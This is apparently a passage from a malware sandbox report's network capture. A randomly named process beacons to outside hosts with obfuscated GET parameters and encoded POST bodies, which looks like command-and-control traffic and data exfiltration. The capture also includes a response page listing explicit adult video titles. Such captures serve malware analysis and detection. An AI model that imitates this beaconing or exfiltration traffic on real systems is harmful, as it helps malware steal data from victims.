                                                                                  Sep 25, 2024 09:58:21.862937927 CEST651INData Raw: 1f cf 4e 7f 38 ec 0a 39 fb e2 14 17 0e e4 c7 c3 b3 f3 53 14 b7 3f 9c bc 91 61 5e bc 63 67 0e be e7 f5 14 3b 40 6c 7c 3c d7 fe f9 f0 e0 ec 7c 7f fb ac cd 39 05 00 37 0b 58 9a 26 8a 0b 55 20 80 48 68 45 bc 26 67 25 19 39 42 f2 06 81 1c 22 53 cc 70
                                                                                  Data Ascii: N89S?a^cg;@l|<|97X&U HhE&g%9B"Sp"/Ep_8l3|2XAA_-CWCSTH0Ki6Jm:9:lAm%T#Zc;;_Go.nZP7.jVM8S


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.11.2049813137.175.33.56803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:24.398310900 CEST542OUTGET /ytua/?Xb3xI=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:24.568648100 CEST1289INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 18937
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: "66f2e6b3-49f9"
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 75 66 65 66 66 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 33 43 68 74 6d 6c 25 32 30 6c 61 6e 67 25 33 44 25 32 32 7a 68 2d 43 4e 25 32 32 25 33 45 25 33 43 68 65 61 64 25 33 45 25 33 43 74 69 74 6c 65 25 33 45 25 75 35 39 32 37 25 75 38 63 36 31 25 75 38 39 63 36 25 75 39 38 39 31 5f 64 78 32 32 2e 78 79 7a 25 75 35 36 64 65 25 75 35 62 62 36 25 75 35 62 66 63 25 75 38 32 32 61 25 33 43 2f 74 69 74 6c 65 25 33 45 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 6b 65 79 77 6f 72 64 73 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 25 75 37 37 65 64 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 36 34 31 65 25 75 37 62 31 31 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 38 39 63 36 25 75 39 38 39 31 25 75 35 32 30 36 25 75 34 65 61 62 25 32 43 25 75 35 31 34 64 25 75 38 64 33 39 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 [TRUNCATED]
                                                                                  Data Ascii: <script>...document.write(unescape("%ufeff%3C%21DOCTYPE%20html%3E%3Chtml%20lang%3D%22zh-CN%22%3E%3Chead%3E%3Ctitle%3E%u5927%u8c61%u89c6%u9891_dx22.xyz%u56de%u5bb6%u5bfc%u822a%3C/title%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22%u77ed%u89c6%u9891%2C%u641e%u7b11%u89c6%u9891%2C%u89c6%u9891%u5206%u4eab%2C%u514d%u8d39%u89c6%u9891%2C%u5728%u7ebf%u89c6%u9891%2C%u9884%u544a%u7247%22%3E%3Cmeta%20name%3D%22description%22%20content%3D%22%u63d0%u4f9b%u6700%u65b0%u6700%u5feb%u7684%u89c6%u9891%u5206%u4eab%u6570%u636e%22%3E%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%20/%3E%3Cmeta%20name%3D%22renderer%22%20content%3D%22webkit%7Cie-comp%7Cie-stand%22%20/%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%20/%3E%3Cmeta%20name%3D%22format-detection%22%20content%3D%22telephone%3Dno%22%20/%3E%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3D480%2C%20user-scalable%3Dno%2C%20viewport-fit%3Dcover%22%20/%3E%3Cmeta%20http-equiv%3D%22Cache- [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:24.568845034 CEST1289INData Raw: 32 6e 6f 2d 63 61 63 68 65 25 32 43 25 32 30 6e 6f 2d 73 74 6f 72 65 25 32 43 25 32 30 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 25 32 32 25 32 30 2f 25 33 45 25 33 43 73 63 72 69 70 74 25 32 30 73 72 63 25 33 44 25 32 32 2f 54 70 6c 2f 63 6c
                                                                                  Data Ascii: 2no-cache%2C%20no-store%2C%20must-revalidate%22%20/%3E%3Cscript%20src%3D%22/Tpl/cl/facai/js/cnzz.js%22%20type%3D%22text/javascript%22%3E%3C/script%3E%3Clink%20href%3D%22/Tpl/cl/facai/css/global.css%22%20rel%3D%22stylesheet%22%20/%3E%3Clink%20h
                                                                                  Sep 25, 2024 09:58:24.568955898 CEST1289INData Raw: 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6c 65 61 72 25 32 32 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33
                                                                                  Data Ascii: iv%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22head_h%22%3E%3C/div%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.top_banner%29%3B%3C/script%3E%3Cdiv%20class%3D%22container%20rm_bq
                                                                                  Sep 25, 2024 09:58:24.568973064 CEST1289INData Raw: 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 6d 64 31 34 35 76 31 2e 63 6f 6d 2f 68 76 76 66 61 64 65 67 2f 69 6e 64 65 78 2e 6a 70 67 2e 6a 73 25 32 32 25 32 30 73 72 63 25 33 44 25 32 32 2f 69 6d 61 67 65 73 2f 62 6c 61 6e 6b 2e 70 6e 67 25 32 32
                                                                                  Data Ascii: D%22https%3A//md145v1.com/hvvfadeg/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34340.html%22%20target%3D%22_blank%22%3E%u570b%u7522AV-%u9ebb%u8c46%u50b3%u5a
                                                                                  Sep 25, 2024 09:58:24.569760084 CEST1289INData Raw: 43 2f 61 25 33 45 25 33 43 2f 68 33 25 33 45 25 33 43 73 70 61 6e 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 5f 6a 25 32 32 25 33 45 25 33 43 2f 73 70 61 6e 25 33 45 25 33 43 73 70 61 6e 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 7a 5f 73 25 32
                                                                                  Data Ascii: C/a%3E%3C/h3%3E%3Cspan%20class%3D%22s_j%22%3E%3C/span%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22col-lg-4%20col-md-4%20col-xs-6%22%3E%3Cdiv%20class%3D%2
                                                                                  Sep 25, 2024 09:58:24.569873095 CEST1289INData Raw: 6c 25 32 32 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 6c 69 6e 6c 69 6e 62 65 62 65 7e 25 75 36 37 30 30 25 75 39 37 35 32 25 75 36 36 32 35 25 75 36 37 30 30 25 75 36 35 36 32 25 75 37 33 61 39 25 75 37 36
                                                                                  Data Ascii: l%22%20target%3D%22_blank%22%3Elinlinbebe~%u6700%u9752%u6625%u6700%u6562%u73a9%u7684%u5973%u5927%u751f%u51fa%u51fb%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E
                                                                                  Sep 25, 2024 09:58:24.570997000 CEST1289INData Raw: 25 33 43 68 33 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34 33 31 36 2e 68 74 6d 6c 25 32 32 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 52 41 53 2d 30 33 33 35 7e 25 75 36
                                                                                  Data Ascii: %3Ch3%3E%3Ca%20href%3D%22/p/1/34316.html%22%20target%3D%22_blank%22%3ERAS-0335~%u6293%u7372%u5de8%u4e73OL%u5077%u60c5%u5f71%u7247~%u533f%u540d%u8abf%u6559%u5c08%u5c6c%u8089%u4fbf%u5668%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%
                                                                                  Sep 25, 2024 09:58:24.571106911 CEST1289INData Raw: 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 77 5f 7a 25 32 32 25 33 45 25 33 43 68 33 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34 33 31 34 2e 68 74 6d 6c 25 32 32
                                                                                  Data Ascii: %3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34314.html%22%20target%3D%22_blank%22%3E%u4fc4%u7f57%u65af%u5973%u795e%u5feb%u9012%u5c0f%u54e5%u9001%u8d27%u4e0a%u95e8%u5374%u88ab%u5c11%u5987%u6027%u611f%u900f%u89c6%u6e14%u
                                                                                  Sep 25, 2024 09:58:24.571369886 CEST1289INData Raw: 32 32 25 33 45 4a 4b 53 52 36 34 30 25 75 32 35 61 31 41 56 25 75 35 32 33 36 25 75 39 30 32 30 25 75 35 35 34 36 25 75 37 39 64 38 25 75 35 62 63 36 25 75 36 35 33 36 25 75 39 36 63 36 25 75 37 36 38 34 4c 69 6d 61 6e 69 61 25 75 38 32 37 32 25
                                                                                  Data Ascii: 22%3EJKSR640%u25a1AV%u5236%u9020%u5546%u79d8%u5bc6%u6536%u96c6%u7684Limania%u8272%u60c5%u5f71%u724710%u4e2a%u8fab%u5b50%u5973%u5b69%u5b8c%u6574%u72484%u5c0f%u65f6V%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22cl
                                                                                  Sep 25, 2024 09:58:24.571496010 CEST1289INData Raw: 32 32 63 6f 6c 2d 6c 67 2d 34 25 32 30 63 6f 6c 2d 6d 64 2d 34 25 32 30 63 6f 6c 2d 78 73 2d 36 25 32 32 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 5f 72 25 32 32 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25
                                                                                  Data Ascii: 22col-lg-4%20col-md-4%20col-xs-6%22%3E%3Cdiv%20class%3D%22n_r%22%3E%3Cdiv%20class%3D%22t_p%22%3E%3Ca%20href%3D%22/p/3/34346.html%22%20target%3D%22_blank%22%3E%3Cimg%20class%3D%22lazy%22%20data-original%3D%22https%3A//md145v1.com/gscujaga/index
                                                                                  Sep 25, 2024 09:58:24.739607096 CEST1289INData Raw: 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 75 35 37 32 38 25 75 36 33 61 35 25 75 39 30 30 31 25 75 38 66 36 36 25 75 34 65 30 61 25 75 38 62 61 39 25 75 36 31 61 37 25 75 36 31 61 63 25 75 37 36 38 34 25 75 35 64
                                                                                  Data Ascii: target%3D%22_blank%22%3E%u5728%u63a5%u9001%u8f66%u4e0a%u8ba9%u61a7%u61ac%u7684%u5de8%u4e73%u62a4%u5de5%u5c3d%u60c5%u8214%u5976%u7684%u8272%u72fc%u8001%u7237%u7237%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22cle


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.11.20498143.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:29.977009058 CEST810OUTPOST /dlt0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Origin: http://www.tukaari.shop
                                                                                  Referer: http://www.tukaari.shop/dlt0/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 4d 58 57 5a 54 75 33 71 46 74 64 65 4e 46 52 6d 59 65 35 6b 44 4d 61 65 50 6a 4b 68 76 4d 7a 38 56 68 71 52 39 6b 70 5a 34 72 48 6e 70 51 77 52 2b 76 43 62 46 4d 57 58 48 7a 54 48 46 65 52 57 71 4e 54 78 41 52 57 74 6d 30 6a 62 62 52 48 71 2b 71 4d 35 71 64 6d 77 61 43 7a 50 5a 54 69 74 74 43 67 49 58 50 74 79 53 50 4c 67 33 4f 31 37 76 47 56 61 2f 58 33 41 5a 74 7a 75 78 32 4f 59 42 58 39 36 44 63 34 4a 77 32 57 2f 37 49 6d 44 62 34 45 71 4d 4d 78 39 67 44 43 4e 70 32 64 79 38 4d 58 2f 56 5a 61 71 73 48 77 54 4d 54 73 6d 6b 52 48 30 48 51 3d 3d
                                                                                  Data Ascii: Xb3xI=wkNNxgFGYdpeMXWZTu3qFtdeNFRmYe5kDMaePjKhvMz8VhqR9kpZ4rHnpQwR+vCbFMWXHzTHFeRWqNTxARWtm0jbbRHq+qM5qdmwaCzPZTittCgIXPtySPLg3O17vGVa/X3AZtzux2OYBX96Dc4Jw2W/7ImDb4EqMMx9gDCNp2dy8MX/VZaqsHwTMTsmkRH0HQ==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.11.20498153.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:32.611330032 CEST830OUTPOST /dlt0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Origin: http://www.tukaari.shop
                                                                                  Referer: http://www.tukaari.shop/dlt0/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 65 6e 6d 5a 66 70 44 71 44 4e 64 66 49 46 52 6d 57 2b 35 67 44 4d 57 65 50 67 47 78 76 2b 58 38 53 45 57 52 38 67 31 5a 35 72 48 6e 77 67 77 55 68 2f 43 75 46 4d 61 68 48 7a 66 48 46 65 31 57 71 4d 50 78 41 6d 4b 75 30 55 6a 46 4f 42 48 6f 68 36 4d 35 71 64 6d 77 61 43 32 61 5a 54 36 74 73 7a 51 49 57 75 74 31 59 76 4c 76 2b 75 31 37 72 47 56 65 2f 58 33 69 5a 73 65 35 78 31 6d 59 42 54 35 36 4e 70 4d 4b 6c 6d 58 32 2f 49 6e 42 55 59 64 63 49 2f 31 4a 78 42 57 57 73 46 55 4f 35 61 47 6c 49 72 75 4f 76 55 73 68 49 6a 56 4f 6d 54 47 76 61 53 6b 7a 61 37 67 7a 63 52 68 38 6f 45 43 59 38 54 66 49 59 75 34 3d
                                                                                  Data Ascii: Xb3xI=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+X8SEWR8g1Z5rHnwgwUh/CuFMahHzfHFe1WqMPxAmKu0UjFOBHoh6M5qdmwaC2aZT6tszQIWut1YvLv+u17rGVe/X3iZse5x1mYBT56NpMKlmX2/InBUYdcI/1JxBWWsFUO5aGlIruOvUshIjVOmTGvaSkza7gzcRh8oECY8TfIYu4=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.11.20498163.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:35.251199961 CEST2578OUTPOST /dlt0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Origin: http://www.tukaari.shop
                                                                                  Referer: http://www.tukaari.shop/dlt0/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 65 6e 6d 5a 66 70 44 71 44 4e 64 66 49 46 52 6d 57 2b 35 67 44 4d 57 65 50 67 47 78 76 2b 66 38 56 32 4f 52 39 42 31 5a 72 37 48 6e 34 41 77 56 68 2f 43 7a 46 4d 43 39 48 7a 43 38 46 59 78 57 6c 4f 72 78 45 6e 4b 75 74 6b 6a 46 57 78 48 31 2b 71 4d 57 71 5a 4c 37 61 43 6d 61 5a 54 36 74 73 77 49 49 52 2f 74 31 65 76 4c 67 33 4f 31 42 76 47 56 36 2f 57 66 59 5a 73 72 45 77 46 47 59 41 33 64 36 50 62 55 4b 34 57 58 34 79 6f 6e 6a 55 59 68 50 49 2b 5a 76 78 41 79 73 73 47 6b 4f 35 65 2f 76 64 36 61 72 74 46 77 53 49 42 4a 32 6f 53 65 38 64 68 64 50 55 4c 34 4e 43 6e 42 79 68 56 47 78 70 54 50 50 43 70 41 74 57 35 31 6a 6b 6f 42 6b 52 35 69 50 45 74 38 74 70 74 66 32 48 4f 79 62 31 47 5a 6a 69 55 6f 4d 51 47 54 4c 41 72 76 77 4a 4b 56 36 6b 66 62 4a 6b 70 72 63 49 30 53 35 4a 79 54 38 63 56 37 57 36 45 49 30 2f 59 42 61 54 69 6f 68 78 52 54 48 56 4d 4f 6e 58 46 48 37 4c 7a 57 37 51 59 6e 42 48 71 44 7a 2f 39 32 59 2f 6b 65 65 79 57 74 58 53 66 53 2b [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+f8V2OR9B1Zr7Hn4AwVh/CzFMC9HzC8FYxWlOrxEnKutkjFWxH1+qMWqZL7aCmaZT6tswIIR/t1evLg3O1BvGV6/WfYZsrEwFGYA3d6PbUK4WX4yonjUYhPI+ZvxAyssGkO5e/vd6artFwSIBJ2oSe8dhdPUL4NCnByhVGxpTPPCpAtW51jkoBkR5iPEt8tptf2HOyb1GZjiUoMQGTLArvwJKV6kfbJkprcI0S5JyT8cV7W6EI0/YBaTiohxRTHVMOnXFH7LzW7QYnBHqDz/92Y/keeyWtXSfS+JUP8JMjVIswAmypxde+o4KaXksjqebVeq3zP8aGRTD/O407f9QQ85Q/xvPaRwZJuJoh3dO0weiW+6vEMQ/NKf51bODb3vR/nKrPkLc1fwMFWvp+LCXCgnKc1UW+436n0PcWA727vq5GK7EXBQsEaVnBU7fLz95XJipw6QM+wV7XkLnkSBiCsJJ+J7g4BRCZvay48RICYTuNBjp42L3klXS2Q0WFoJVIDJX/LCzhE6XQT3UaQ8YKGAz5cD/t5kAEGadUoVb0F8JpfTyncf5nQlqpPFMy0FfXZaFsm16loHdVSQC0a77+ULANyqCvVhyU185zgrWyntifNV/cXFVTWgmyS2H3UFExKhywl0MSk9L6eg6kPjtqQ7NMRQSdcPYWGQ00rPtFWDG4ykiIkOVHaM0s2/zVwR9Y12/1B8wfd8FA2W+zqjbIKj89XLryQ6wjBdCVKSY585H4aPU+QsXeb35oP2vg6YtRbZIxBm8rHgSQWQU0HhYqg4RJthpEPnMPa4wKxyFQbdo1fooIXAolPjkLkG5owiazHWOlHBw4mHpqNqZOgOlWyTlg/hw8g8vUVH6hGWDnveGYCaA8VL2gtu8kGSg2jkYjl+5iZw96spxU9gNOl1T3v8FWWT7LdymxIZHi8dF/PtKdpzupu80tmsj8aBlmOGMRr0d [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:35.251262903 CEST3867OUTData Raw: 4d 39 37 77 79 2f 6d 4a 39 68 37 49 67 4f 52 78 37 72 67 7a 50 6f 50 53 61 38 79 65 6b 4e 66 4b 76 45 35 6c 39 65 77 6d 70 48 70 70 4b 51 69 65 62 53 6b 4c 4c 37 78 2b 6d 78 73 42 71 6d 50 34 54 46 69 64 77 78 4e 4c 56 76 76 61 44 69 37 47 67 5a
                                                                                  Data Ascii: M97wy/mJ9h7IgORx7rgzPoPSa8yekNfKvE5l9ewmpHppKQiebSkLL7x+mxsBqmP4TFidwxNLVvvaDi7GgZUzccChxnzM+OkmgzAskP5IRRUVkPmpdGLQFSzChhQn3KO5jvUo3lNggck1k3PwGPq967UxkrBLsn5JZC+ucSTS85AgV0ieJiUcqD1Sp++p7vG1Xu+KRqjlQFHic/Md2+WLWA+oztTfgfT60uBLsknL+tIa+ixy5p4
                                                                                  Sep 25, 2024 09:58:35.251281023 CEST1534OUTData Raw: 61 76 6c 69 6f 7a 30 7a 7a 68 31 4d 67 43 72 45 55 5a 49 75 4e 32 71 47 4f 65 76 59 37 77 51 64 63 38 41 48 31 69 50 4c 59 7a 77 73 47 6e 38 72 45 63 79 37 4b 78 4e 64 78 6b 34 49 7a 49 37 73 39 45 68 66 33 74 64 39 57 39 58 66 52 70 77 41 76 53
                                                                                  Data Ascii: avlioz0zzh1MgCrEUZIuN2qGOevY7wQdc8AH1iPLYzwsGn8rEcy7KxNdxk4IzI7s9Ehf3td9W9XfRpwAvSZdaG827NY/RGzSY9hZo7kSekwFVc+2fNRehv3Qa4w6lBWIk1rIw6lQfx3F8RBmOXHyToYkzkWDtE2EddYnbPzxCJtrzQJtpbXOmAQXFnPOCzEAKEQ2XGKFdeBWlrdc5ST4ijZul3QmQz6939kI9E6vR0m01vi3/jP


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.11.20498173.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:37.889362097 CEST546OUTGET /dlt0/?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:37.994091988 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:58:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 33 78 49 3d 39 6d 6c 74 79 55 70 71 54 70 4e 46 47 67 69 4c 4c 4d 2f 51 49 74 30 4a 41 31 45 79 61 4c 56 77 62 4e 4f 36 4c 56 4b 38 78 4d 4b 41 61 68 71 4f 30 6b 78 38 35 4e 72 72 72 7a 74 49 34 2b 57 64 4a 2b 57 6d 46 53 58 65 43 4e 4d 33 39 50 48 64 49 47 6a 44 31 6e 44 38 63 6b 4f 63 67 61 63 51 74 73 69 6d 55 6a 6e 4a 65 79 44 67 6c 53 59 65 58 35 39 63 64 50 34 3d 26 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  62192.168.11.2049818208.91.197.27803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:46.210294962 CEST548OUTGET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.inastra.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:46.820354939 CEST850INHTTP/1.1 200 OK
                                                                                  Date: Wed, 25 Sep 2024 07:58:46 GMT
                                                                                  Server: Apache
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
